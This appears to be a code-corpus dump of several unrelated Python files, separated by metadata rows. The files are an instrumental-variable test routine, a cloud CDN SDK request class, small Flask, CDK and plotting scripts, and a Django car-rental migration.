| 30.4 | 79 | 0.756579 | 38 | 304 | 6.052632 | 0.552632 | 0.104348 | 0.156522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164474 | 304 | 9 | 80 | 33.777778 | 0.905512 | 0 | 0 | 0 | 0 | 0 | 0.5625 | 0.154605 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e8abf7ea4446423696d80792fe2cb2b54d44aefa | 11,176 | py | Python | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | fixedeffect/iv/ivtest.py | rphilipzhang/FixedEffectModel | 017a6f555fff44392d33e45e26c406d02ddde109 | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import scipy as sp
from io import StringIO
import warnings
from statsmodels.iolib.table import SimpleTable
from scipy.stats import chi2
import statsmodels.api as sm
from ..utils.Forg import forg
from ..utils.TableFormat import gen_fmt, fmt_2
#function generate instrumental variables test
def ivtest(result):
"""
:param result: List of endogenous variables
:return: a table of result
"""
if result.iv == []:
raise NameError('there is no iv')
exog_x = result.exog_x
iv_col = result.iv
out_col = result.dependent
endog_x = result.endog_x
if result.endog_x:
old_x = exog_x + result.endog_x
if 'const' in result.x_second_stage:
old_x = ['const'] + old_x
else:
old_x = exog_x
for i in endog_x:
if i in old_x:
old_x.remove(i)
all_exo_x = old_x + iv_col
demeaned_df = result.demeaned_df #pass object so easier to reference
z = demeaned_df[iv_col].values
y = demeaned_df[out_col].values
x_exog = demeaned_df[old_x].values
x_endog = demeaned_df[endog_x].values
z_ = demeaned_df[all_exo_x].values
nobs = result.demeaned_df.shape[0]
k1 = len(old_x)
k2 = len(iv_col)
# x related stuff
xpx_inv = np.linalg.inv(np.dot(x_exog.T, x_exog))
px = np.dot(np.dot(x_exog,xpx_inv),x_exog.T)
m_x = np.identity(nobs) - px
y_proj = np.dot(m_x, x_endog)
z_proj = np.dot(m_x, z)
# z related stuff
zpz_inv_proj = np.linalg.inv(np.dot(z_proj.T, z_proj))
pz_proj = np.dot(np.dot(z_proj,zpz_inv_proj),z_proj.T)
zpz_full = np.dot(z_.T, z_)
zpz_inv_full = np.linalg.inv(zpz_full)
pz_full = np.dot(np.dot(z_,zpz_inv_full),z_.T)
m_z_full = np.identity(nobs) - pz_full
sigma_vv = np.dot(np.dot(x_endog.T,m_z_full),x_endog)/(nobs - k1 - k2)
sigma_vv_inv_sqrt = np.linalg.inv(sp.linalg.sqrtm(sigma_vv))
fstat_matrix_meat = np.dot(np.dot(y_proj.T, pz_proj),y_proj)
fstat_matrix = np.dot(np.dot(sigma_vv_inv_sqrt.T, fstat_matrix_meat),sigma_vv_inv_sqrt)/k2
cd_stat = min(np.linalg.eigvals(fstat_matrix))
cd_stat = round(cd_stat,6)
# critical value in stock and yogo 2005
tab_5_2 = u"""\
k2_tab,0.1,0.15,0.2,0.25,0.1,0.15,0.2,0.25
1,16.38,8.96,6.66,5.53,,,,
2,19.93,11.59,8.75,7.25,7.03,4.58,3.95,3.63
3,22.3,12.83,9.54,7.8,13.43,8.18,6.4,5.45
4,24.58,13.96,10.26,8.31,16.87,9.93,7.54,6.28
5,26.87,15.09,10.98,8.84,19.45,11.22,8.38,6.89
6,29.18,16.23,11.72,9.38,21.68,12.33,9.1,7.42
7,31.5,17.38,12.48,9.93,23.72,13.34,9.77,7.91
8,33.84,18.54,13.24,10.5,25.64,14.31,10.41,8.39
9,36.19,19.71,14.01,11.07,27.51,15.24,11.03,8.85
10,38.54,20.88,14.78,11.65,29.32,16.16,11.65,9.31
11,40.9,22.06,15.56,12.23,31.11,17.06,12.25,9.77
12,43.27,23.24,16.35,12.82,32.88,17.95,12.86,10.22
13,45.64,24.42,17.14,13.41,34.62,18.84,13.45,10.68
14,48.01,25.61,17.93,14,36.36,19.72,14.05,11.13
15,50.39,26.8,18.72,14.6,38.08,20.6,14.65,11.58
16,52.77,27.99,19.51,15.19,39.8,21.48,15.24,12.03
17,55.15,29.19,20.31,15.79,41.51,22.35,15.83,12.49
18,57.53,30.38,21.1,16.39,43.22,23.22,16.42,12.94
19,59.92,31.58,21.9,16.99,44.92,24.09,17.02,13.39
20,62.3,32.77,22.7,17.6,46.62,24.96,17.61,13.84
21,64.69,33.97,23.5,18.2,48.31,25.82,18.2,14.29
22,67.07,35.17,24.3,18.8,50.01,26.69,18.79,14.74
23,69.46,36.37,25.1,19.41,51.7,27.56,19.38,15.19
24,71.85,37.57,25.9,20.01,53.39,28.42,19.97,15.64
25,74.24,38.77,26.71,20.61,55.07,29.29,20.56,16.1
26,76.62,39.97,27.51,21.22,56.76,30.15,21.15,16.55
27,79.01,41.17,28.31,21.83,58.45,31.02,21.74,17
28,81.4,42.37,29.12,22.43,60.13,31.88,22.33,17.45
29,83.79,43.57,29.92,23.04,61.82,32.74,22.92,17.9
30,86.17,44.78,30.72,23.65,63.51,33.61,23.51,18.35 """
#not used for now. may add in future
tab_5_1 = u"""\
k2_tab,0.05,0.1,0.2,0.3,0.05,0.1,0.2,0.3,0.05,0.1,0.2,0.3
3,13.91,9.08,6.46,5.39,,,,,,,,
4,16.85,10.27,6.71,5.34,11.04,7.56,5.57,4.73,,,,
5,18.37,10.83,6.77,5.25,13.97,8.78,5.91,4.79,9.53,6.61,4.99,4.3
6,19.28,11.12,6.76,5.15,15.72,9.48,6.08,4.78,12.2,7.77,5.35,4.4
7,19.86,11.29,6.73,5.07,16.88,9.92,6.16,4.76,13.95,8.5,5.56,4.44
8,20.25,11.39,6.69,4.99,17.7,10.22,6.2,4.73,15.18,9.01,5.69,4.46
9,20.53,11.46,6.65,4.92,18.3,10.43,6.22,4.69,16.1,9.37,5.78,4.46
10,20.74,11.49,6.61,4.86,18.76,10.58,6.23,4.66,16.8,9.64,5.83,4.45
11,20.9,11.51,6.56,4.8,19.12,10.69,6.23,4.62,17.35,9.85,5.87,4.44
12,21.01,11.52,6.53,4.75,19.4,10.78,6.22,4.59,17.8,10.01,5.9,4.42
13,21.1,11.52,6.49,4.71,19.64,10.84,6.21,4.56,18.17,10.14,5.92,4.41
14,21.18,11.52,6.45,4.67,19.83,10.89,6.2,4.53,18.47,10.25,5.93,4.39
15,21.23,11.51,6.42,4.63,19.98,10.93,6.19,4.5,18.73,10.33,5.94,4.37
16,21.28,11.5,6.39,4.59,20.12,10.96,6.17,4.48,18.94,10.41,5.94,4.36
17,21.31,11.49,6.36,4.56,20.23,10.99,6.16,4.45,19.13,10.47,5.94,4.34
18,21.34,11.48,6.33,4.53,20.33,11,6.14,4.43,19.29,10.52,5.94,4.32
19,21.36,11.46,6.31,4.51,20.41,11.02,6.13,4.41,19.44,10.56,5.94,4.31
20,21.38,11.45,6.28,4.48,20.48,11.03,6.11,4.39,19.56,10.6,5.93,4.29
21,21.39,11.44,6.26,4.46,20.54,11.04,6.1,4.37,19.67,10.63,5.93,4.28
22,21.4,11.42,6.24,4.43,20.6,11.05,6.08,4.35,19.77,10.65,5.92,4.27
23,21.41,11.41,6.22,4.41,20.65,11.05,6.07,4.33,19.86,10.68,5.92,4.25
24,21.41,11.4,6.2,4.39,20.69,11.05,6.06,4.32,19.94,10.7,5.91,4.24
25,21.42,11.38,6.18,4.37,20.73,11.06,6.05,4.3,20.01,10.71,5.9,4.23
26,21.42,11.37,6.16,4.35,20.76,11.06,6.03,4.29,20.07,10.73,5.9,4.21
27,21.42,11.36,6.14,4.34,20.79,11.06,6.02,4.27,20.13,10.74,5.89,4.2
28,21.42,11.34,6.13,4.32,20.82,11.05,6.01,4.26,20.18,10.75,5.88,4.19
29,21.42,11.33,6.11,4.31,20.84,11.05,6,4.24,20.23,10.76,5.88,4.18
30,21.42,11.32,6.09,4.29,20.86,11.05,5.99,4.23,20.27,10.77,5.87,4.17
"""
tab_5_1 = StringIO(tab_5_1)
tab_5_2 = StringIO(tab_5_2)
df_5_1 = pd.read_csv(tab_5_1)
df_5_2 = pd.read_csv(tab_5_2)
N = len(endog_x)
critical_val = []
if N==1:
stat_5p = forg(df_5_2['0.1'].iloc[k2-1],4)
stat_10p = forg(df_5_2['0.15'].iloc[k2-1],4)
stat_20p = forg(df_5_2['0.2'].iloc[k2-1],4)
stat_30p = forg(df_5_2['0.25'].iloc[k2-1],4)
critical_val = [(stat_5p, stat_10p, stat_20p, stat_30p)]
elif N==2:
stat_5p = forg(df_5_2['0.1.1'].iloc[k2-1],4)
stat_10p = forg(df_5_2['0.15.1'].iloc[k2-1],4)
stat_20p = forg(df_5_2['0.2.1'].iloc[k2-1],4)
stat_30p = forg(df_5_2['0.25.1'].iloc[k2-1],4)
critical_val = [(stat_5p, stat_10p, stat_20p, stat_30p)]
else:
warnings.warn("Critical values are not provided for number of endogenous variables greater than 3")
critical_val = [(0,0,0,0)]
#-------------------------------------------------------------#
#-------------------- over identification --------------------#
#-------------------------------------------------------------#
if len(iv_col) <= len(endog_x):
warnings.warn("There is no over identification, number of iv <= number of endogenous vars")
sargan_stat = 0
sargan_stat_p_val = 0
b_stat = 0
b_stat_p_val = 0
else:
resid = result.demeaned_df['resid'].values
df_overid = len(all_exo_x)-len(exog_x) # number of overidentification constraints
s_n_1 = np.dot(np.dot(resid,pz_full),resid.T)
s_n_2 = np.dot(resid,resid.T)/nobs
sargan_stat = round(s_n_1/s_n_2,6)
sargan_stat_p_val =round(1 - chi2.cdf(sargan_stat, df_overid),6)
b_1 = s_n_1/df_overid
b_2 = (np.dot(np.dot(resid,m_z_full),resid.T))/(nobs - len(all_exo_x))
b_stat = round(b_1/b_2,6)
b_stat_p_val = round(1 - chi2.cdf(b_stat, df_overid),6)
#-------------------------------------------------------------#
#-------------------- endogeneity test --------------------#
#-------------------------------------------------------------#
uc = demeaned_df['resid'].values
model_test = sm.OLS(demeaned_df[out_col], demeaned_df[old_x + endog_x])
result_test = model_test.fit()
u_e = result_test.resid
z_test = demeaned_df[old_x + iv_col + endog_x ].values
zpz_test = np.dot(z_test.T,z_test)
zpz_test_inv = np.linalg.inv(zpz_test)
pz_test = np.dot(np.dot(z_test,zpz_test_inv),z_test.T)
u_c = demeaned_df.resid.values
#d1 = np.dot(np.dot(u_e.T,pz_test),u_e)
d1 = np.dot(np.dot(u_e.T,pz_test),u_e)
d2 = np.dot(np.dot(u_c.T,pz_full),u_c)
d3 = np.dot(u_e.T,u_e)/nobs
durbin_stat = (d1-d2)/d3
durbin_stat_p_val = round(1 - chi2.cdf(durbin_stat, len(endog_x)),6)
#-------------------------------------------------------#
#-------------------- format output --------------------#
#-------------------------------------------------------#
gen_title = 'Weak IV test with critical values based on 2SLS size'
stat_header = None
gen_stubs = ['Cragg-Donald Statistics:','number of instrumental variables:', 'number of endogenous variables:']
cd_test_stat = [(cd_stat,),(k2,),(N,)]
cd_tab = SimpleTable(cd_test_stat,
stat_header,
gen_stubs,
title = gen_title,
txt_fmt = gen_fmt)
wald_header = ['5%', '10%', '20%', '30%']
wald_test_stat = critical_val
tab_row_name = ['2SLS Size of nominal 5% Wald test']
critical_val_tab = SimpleTable(wald_test_stat,
wald_header,
tab_row_name,
title = None)
print(cd_tab)
print(critical_val_tab)
print('H0: Instruments are weak')
#---------------------------------------------------------#
print()
sargan = (forg(sargan_stat,4),forg(sargan_stat_p_val,4))
Basmann = (forg(b_stat,4),forg(b_stat_p_val,4))
gen_title2 = 'Over identification test - nonrobust'
stat_header2 = ['test statistics', 'p values']
gen_stubs2 = ['Sargan Statistics:','Basmann Statistics:']
overid_stat = [sargan,Basmann]
critical_val_tab = SimpleTable(overid_stat,
stat_header2,
gen_stubs2,
title = gen_title2)
print(critical_val_tab)
#---------------------------------------------------------#
print()
durbin = (forg(durbin_stat,4),forg(durbin_stat_p_val,4))
gen_title3 = 'Tests of endogeneity'
stat_header3 = ['test statistics', 'p values']
gen_stubs3 = ['Durbin Statistics:']
endog_stat = [durbin]
durbin_tab = SimpleTable(endog_stat,
stat_header3,
gen_stubs3,
title = gen_title3)
print(durbin_tab)
print('H0: variables are exogenous')
return | 38.940767 | 115 | 0.561024 | 2,321 | 11,176 | 2.561827 | 0.127962 | 0.026909 | 0.014127 | 0.020182 | 0.134712 | 0.073495 | 0.073158 | 0.062563 | 0.053986 | 0.053986 | 0 | 0.260884 | 0.206693 | 11,176 | 287 | 116 | 38.940767 | 0.409768 | 0.089299 | 0 | 0.042453 | 0 | 0.273585 | 0.417374 | 0.325864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004717 | false | 0 | 0.04717 | 0 | 0.056604 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e8b08e07a124a5894e0a2f6c454b7b7c1764e371 | 2,652 | py | Python | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | qcloudsdkcdn/AddYYCdnHostRequest.py | f3n9/qcloudcli | b965a4f0e6cdd79c1245c1d0cd2ca9c460a56f19 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from qcloudsdkcore.request import Request
class AddYYCdnHostRequest(Request):
def __init__(self):
super(AddYYCdnHostRequest, self).__init__(
'cdn', 'qcloudcliV1', 'AddYYCdnHost', 'cdn.api.qcloud.com')
def get_antiStealingLink(self):
return self.get_params().get('antiStealingLink')
def set_antiStealingLink(self, antiStealingLink):
self.add_param('antiStealingLink', antiStealingLink)
def get_cacheRule(self):
return self.get_params().get('cacheRule')
def set_cacheRule(self, cacheRule):
self.add_param('cacheRule', cacheRule)
def get_ctcBackupCnc(self):
return self.get_params().get('ctcBackupCnc')
def set_ctcBackupCnc(self, ctcBackupCnc):
self.add_param('ctcBackupCnc', ctcBackupCnc)
def get_domain(self):
return self.get_params().get('domain')
def set_domain(self, domain):
self.add_param('domain', domain)
def get_expectedBandwidth(self):
return self.get_params().get('expectedBandwidth')
def set_expectedBandwidth(self, expectedBandwidth):
self.add_param('expectedBandwidth', expectedBandwidth)
def get_haveDynamicResource(self):
return self.get_params().get('haveDynamicResource')
def set_haveDynamicResource(self, haveDynamicResource):
self.add_param('haveDynamicResource', haveDynamicResource)
def get_httpsCrt(self):
return self.get_params().get('httpsCrt')
def set_httpsCrt(self, httpsCrt):
self.add_param('httpsCrt', httpsCrt)
def get_httpsKey(self):
return self.get_params().get('httpsKey')
def set_httpsKey(self, httpsKey):
self.add_param('httpsKey', httpsKey)
def get_remark(self):
return self.get_params().get('remark')
def set_remark(self, remark):
self.add_param('remark', remark)
def get_schemeMode(self):
return self.get_params().get('schemeMode')
def set_schemeMode(self, schemeMode):
self.add_param('schemeMode', schemeMode)
def get_src(self):
return self.get_params().get('src')
def set_src(self, src):
self.add_param('src', src)
def get_srcMethod(self):
return self.get_params().get('srcMethod')
def set_srcMethod(self, srcMethod):
self.add_param('srcMethod', srcMethod)
def get_testUrl(self):
return self.get_params().get('testUrl')
def set_testUrl(self, testUrl):
self.add_param('testUrl', testUrl)
def get_type(self):
return self.get_params().get('type')
def set_type(self, type):
self.add_param('type', type)
| 28.212766 | 71 | 0.673454 | 305 | 2,652 | 5.645902 | 0.127869 | 0.04878 | 0.113821 | 0.138211 | 0.211382 | 0.211382 | 0 | 0 | 0 | 0 | 0 | 0.000945 | 0.202112 | 2,652 | 93 | 72 | 28.516129 | 0.812854 | 0.007919 | 0 | 0 | 0 | 0 | 0.118676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.47541 | false | 0 | 0.016393 | 0.229508 | 0.737705 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
fa038dd03b1d28515952556d3c3ab0b0bb51b2fb | 229 | py | Python | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,544 | 2015-01-01T22:16:31.000Z | 2022-03-31T19:17:45.000Z | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,686 | 2015-01-02T18:26:31.000Z | 2022-03-31T20:12:03.000Z | evennia/scripts/__init__.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 867 | 2015-01-02T21:01:54.000Z | 2022-03-29T00:28:27.000Z | """
This sub-package holds the Scripts system. Scripts are database
entities that can store data both in connection to Objects and Accounts
or globally. They may also have a timer-component to execute various
timed effects.
"""
| 28.625 | 71 | 0.790393 | 36 | 229 | 5.027778 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161572 | 229 | 7 | 72 | 32.714286 | 0.942708 | 0.956332 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
fa2bb53c12a588d29d43ef76a7170a5b55b0cd87 | 99 | py | Python | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | year calendar.py | jeettilva/python | 9e0fb551d42d4b9de773526338df14dba161e9ac | [
"MIT"
] | null | null | null | import calendar
year=int(input("Enter Year: "))
display=calendar.calendar(year)
print(display)
| 19.8 | 32 | 0.747475 | 13 | 99 | 5.692308 | 0.615385 | 0.324324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 99 | 4 | 33 | 24.75 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0.126316 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
fa38201582ef2a31b32936a30e7d0ddfc7dab3bd | 119 | py | Python | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | null | null | null | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | 2 | 2021-03-11T04:07:09.000Z | 2022-02-27T09:28:21.000Z | test.py | Andersonlima1/allflix0 | 9403c0a2995bf9930daa795b12aafc527fcf895b | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0,2*np.pi)
y = np.sin(x)
plt.plot(x,y)
plt.show()
| 13.222222 | 31 | 0.689076 | 26 | 119 | 3.153846 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.151261 | 119 | 8 | 32 | 14.875 | 0.792079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3aff9c27dea9b20fa0008ede185890ed6a920bed | 347 | py | Python | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | aspen/simplates/renderers/stdlib_format.py | galuszkak/aspen.py | a29047d6d4eefa47413e35a18068946424898364 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import Renderer, Factory
class Renderer(Renderer):
def render_content(self, context):
return self.compiled.format(**context)
class Factory(Factory):
Renderer = Renderer
| 20.411765 | 46 | 0.786744 | 41 | 347 | 6.170732 | 0.487805 | 0.158103 | 0.252964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158501 | 347 | 16 | 47 | 21.6875 | 0.866438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.5 | 0.1 | 1 | 0.1 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
d70cdf1b3fd5dbaacf3bf1557ab2f5ac8f345357 | 186 | py | Python | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | 2 | 2017-10-24T16:01:57.000Z | 2017-11-15T18:34:41.000Z | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/objects.py | cuongnb14/cookiecutter-flask-restful | d2da71f192db626370ae702c358eadaf1bbc905a | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask("{{cookiecutter.project_slug}}")
app.config.from_pyfile('configs/config.py')
# Init db
db = SQLAlchemy(app)
| 20.666667 | 44 | 0.774194 | 26 | 186 | 5.423077 | 0.538462 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107527 | 186 | 8 | 45 | 23.25 | 0.849398 | 0.037634 | 0 | 0 | 0 | 0 | 0.259887 | 0.163842 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d70dbb086c453cdfe83adaf8ebde0a689fb10df9 | 209 | py | Python | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | 2 | 2020-09-16T08:20:34.000Z | 2020-09-16T09:19:22.000Z | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | null | null | null | asg_alb_webservers/app.py | darko-mesaros/awsome_building_in_the_cloud_demos | baff18904bb87d74fa13bcf1ef926dbe4f361da6 | [
"MIT"
] | 1 | 2021-05-23T04:32:38.000Z | 2021-05-23T04:32:38.000Z | #!/usr/bin/env python3
from aws_cdk import core
from asg_alb_webservers.asg_alb_webservers_stack import AsgAlbWebserversStack
app = core.App()
AsgAlbWebserversStack(app, "asg-alb-webservers")
app.synth()
| 17.416667 | 77 | 0.803828 | 29 | 209 | 5.586207 | 0.551724 | 0.111111 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005319 | 0.100478 | 209 | 11 | 78 | 19 | 0.856383 | 0.100478 | 0 | 0 | 0 | 0 | 0.096257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d7163abb8cab8d97f9dd68760c6b806b28f3c2cd | 4,284 | py | Python | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0001_initial.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-10-17 12:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Car',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('model_year', models.CharField(max_length=100, null=True)),
('description', models.CharField(blank=True, max_length=100, null=True)),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category_name', models.CharField(max_length=100, null=True)),
('price_per_day', models.FloatField(max_length=10, null=True)),
('occupant_amount', models.CharField(max_length=100, null=True)),
('baggage_amount', models.CharField(max_length=100, null=True)),
('driver_age', models.FloatField(max_length=10, null=True)),
('Power', models.FloatField(max_length=10, null=True)),
('door_amount', models.FloatField(max_length=10, null=True)),
('acriss_code', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('phone', models.CharField(max_length=100, null=True)),
('email', models.CharField(max_length=100, null=True)),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Station',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, null=True)),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.city')),
],
),
migrations.CreateModel(
name='Reservation',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_date', models.DateTimeField(null=True)),
('dropoff_date', models.DateTimeField(null=True)),
('car', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.car')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pickup_city', to='accounts.city')),
('city1', models.ForeignKey(default='---------', on_delete=django.db.models.deletion.CASCADE, related_name='return_city', to='accounts.city')),
('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.customer')),
('station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pickup_station', to='accounts.station')),
('station1', models.ForeignKey(default='---------', on_delete=django.db.models.deletion.CASCADE, related_name='return_station', to='accounts.station')),
],
),
migrations.AddField(
model_name='car',
name='category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.category'),
),
]
